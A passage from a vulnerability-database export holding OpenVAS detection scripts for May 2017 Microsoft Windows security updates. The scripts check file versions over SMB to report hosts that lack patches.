= TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n{\n if(version_is_less(version:winVer, test_version:\"5.2.3790.6080\"))\n {\n Vulnerable_range = \"Less than 5.2.3790.6080\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:54", "description": "This host is missing an important security\n update according to Microsoft KB4018556", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft COM Multiple Vulnerabilities (KB4018556)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0244", "CVE-2017-0214", "CVE-2017-0258", "CVE-2017-0213"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811118", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811118", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft COM Multiple Vulnerabilities (KB4018556)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811118\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0244\", \"CVE-2017-0258\");\n script_bugtraq_id(98112, 98109, 98103, 98102);\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:51:18 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft COM Multiple Vulnerabilities (KB4018556)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4018556\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The Windows kernel improperly initializes objects in memory.\n\n - The way that the Windows Kernel handles objects in memory.\n\n - Windows fails to properly validate input before loading type libraries.\n\n - An unspecified error in Windows COM Aggregate Marshaler.\");\n\n script_tag(name:\"impact\", value:\"An attacker who successfully exploited the\n vulnerability can elevate their privilege level, can lead to denial of\n service condition, could obtain information to further compromise the users\n system and run arbitrary code with elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4018556\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nif(!asVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\")){\n exit(0);\n}\n\nif(version_is_less(version:asVer, test_version:\"6.0.6002.19773\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19773\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:asVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24088\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24088\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Ole32.dll\" + '\\n' +\n 'File version: ' + asVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:39", "description": "This host is missing a critical/important\n security update according to Microsoft KB4019472.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019472)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0230", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0221", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811107", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811107", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019472)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811107\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0190\",\n \"CVE-2017-0212\", \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0221\",\n \"CVE-2017-0222\", \"CVE-2017-0226\", \"CVE-2017-0227\", \"CVE-2017-0228\",\n \"CVE-2017-0229\", \"CVE-2017-0230\", \"CVE-2017-0231\", \"CVE-2017-0233\",\n \"CVE-2017-0234\", \"CVE-2017-0236\", \"CVE-2017-0238\", \"CVE-2017-0240\",\n \"CVE-2017-0241\", \"CVE-2017-0246\", \"CVE-2017-0248\", \"CVE-2017-0258\",\n \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0266\", \"CVE-2017-0267\",\n \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\",\n \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\",\n \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\",\n \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98097, 98298, 98099, 98102, 98103, 98147, 98127,\n 98139, 98281, 98164, 98217, 98222, 98173, 98179, 98229, 98234,\n 98237, 98203, 98208, 98108, 98117, 98112, 98113, 98258, 98276,\n 98259, 98261, 98263, 98264, 98265, 98260, 98274, 98266, 98267,\n 98268, 98270, 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:54:53 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019472)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical/important\n security update according to Microsoft KB4019472.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, spoof content, bypass\n certain security restrictions and cause a host machine to crash.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4019472\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1197\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.14393.0 - 11.0.14393.1197\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:21", "description": "This host is missing a critical security\n update according to Microsoft Security update KB4016871.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4016871)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0235", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0230", "CVE-2017-0224", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811108", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4016871)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811108\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0212\", \"CVE-2017-0213\",\n \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0224\", \"CVE-2017-0226\",\n \"CVE-2017-0227\", \"CVE-2017-0228\", \"CVE-2017-0229\", \"CVE-2017-0230\",\n \"CVE-2017-0231\", \"CVE-2017-0233\", \"CVE-2017-0234\", \"CVE-2017-0235\",\n \"CVE-2017-0236\", \"CVE-2017-0238\", \"CVE-2017-0240\", \"CVE-2017-0241\",\n \"CVE-2017-0246\", \"CVE-2017-0248\", \"CVE-2017-0258\", \"CVE-2017-0259\",\n \"CVE-2017-0263\", \"CVE-2017-0266\", \"CVE-2017-0267\", \"CVE-2017-0268\",\n \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\", \"CVE-2017-0272\",\n \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\", \"CVE-2017-0276\",\n \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98099, 98102, 98103, 98127, 98214, 98139, 98281,\n 98164, 98217, 98222, 98173, 98179, 98229, 98230, 98234, 98237,\n 98203, 98208, 98108, 98117, 98112, 98113, 98258, 98276, 98259,\n 98261, 98263, 98264, 98265, 98260, 98274, 98266, 98267, 98268,\n 98270, 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:52:53 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4016871)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Security update KB4016871.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This monthly rollup,\n\n - Addressed issue with Surface Hub devices waking from sleep approximately\n every four minutes after the first two hours.\n\n - Addressed issue where autochk.exe can randomly skip drive checks and not fix\n corruptions, which may lead to data loss.\n\n - Addressed an issue where Microsoft Edge users in networking environments that\n do not fully support the TCP Fast Open standard may have problems connecting\n to some websites. Users can re-enable TCP Fast Open in about:flags.\n\n - Addressed issues with Arc Touch mouse Bluetooth connectivity.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, cause a host\n machine to crash, spoof content and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4016871\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4016871\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.295\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.15063.0 - 11.0.15063.295\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:20:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0171"], "description": "This host is missing an important security\n update according to Microsoft KB4018196", "modified": "2020-06-04T00:00:00", "published": "2017-05-10T00:00:00", "id": "OPENVAS:1361412562310811115", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811115", "type": "openvas", "title": "Microsoft Windows DNS Server Denial of Service Vulnerability (KB4018196)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows DNS Server Denial of Service Vulnerability (KB4018196)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811115\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0171\");\n script_bugtraq_id(98097);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:41:18 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows DNS Server Denial of Service Vulnerability (KB4018196)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4018196\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists when the server is\n configured to answer version queries. An attacker who successfully exploited\n this vulnerability could cause the DNS Server service to become nonresponsive.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attcker to send malicious DNS queries, which results in denial of service.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4018196\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0171\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nif(!asVer = fetch_file_version(sysPath:sysPath, file_name:\"Dns.exe\")){\n exit(0);\n}\n\nif(version_is_less(version:asVer, test_version:\"6.0.6002.19765\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19765\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:asVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24088\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24088\";\n VULN = TRUE ;\n}\n\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Dns.exe\" + '\\n' +\n 'File version: ' + asVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-06-08T23:26:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0242"], "description": "This host is missing an important security\n update according to Microsoft KB4018927.", "modified": "2020-06-04T00:00:00", "published": "2017-05-10T00:00:00", "id": "OPENVAS:1361412562310811031", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811031", "type": "openvas", "title": "Microsoft ActiveX 'Msadcf.dll' Information Disclosure Vulnerability (KB4018927)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft ActiveX 'Msadcf.dll' Information Disclosure Vulnerability (KB4018927)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811031\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0242\");\n script_bugtraq_id(98275);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 11:36:48 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft ActiveX 'Msadcf.dll' Information Disclosure Vulnerability (KB4018927)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4018927.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to some error in the\n way some ActiveX objects are instantiated.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain access to sensitive information which can aid in further compromise of\n the user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4018927\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0242\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\npath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(!path){\n exit(0);\n}\n\nfilePath = path + \"\\System\\msadc\";\nfileVer = fetch_file_version(sysPath:filePath, file_name:\"msadcf.dll\");\n\nif(version_is_less(version:fileVer, test_version:\"6.0.6002.19770\"))\n{\n VULN = TRUE ;\n vulnerable_range = \"Less than 6.0.6002.19770\";\n}\nelse if(version_in_range(version:fileVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24088\"))\n{\n VULN = TRUE ;\n vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24088\";\n}\n\nif(VULN)\n{\n report = 'File checked: ' + filePath + \"\\msadcf.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: ' + vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-08T23:20:33", "description": "This host is missing an important security\n update according to Microsoft Security update KB4018821", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Kernel Information Disclosure Vulnerability (KB4018821)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0220"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811119", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811119", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel Information Disclosure Vulnerability (KB4018821)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811119\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0220\");\n script_bugtraq_id(98111);\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:57:18 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft Windows Kernel Information Disclosure Vulnerability (KB4018821)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Security update KB4018821\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists as the windows kernel\n improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"An attacker who successfully exploited the\n vulnerability could obtain sensitive information to further compromise the\n user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4018821\");\n 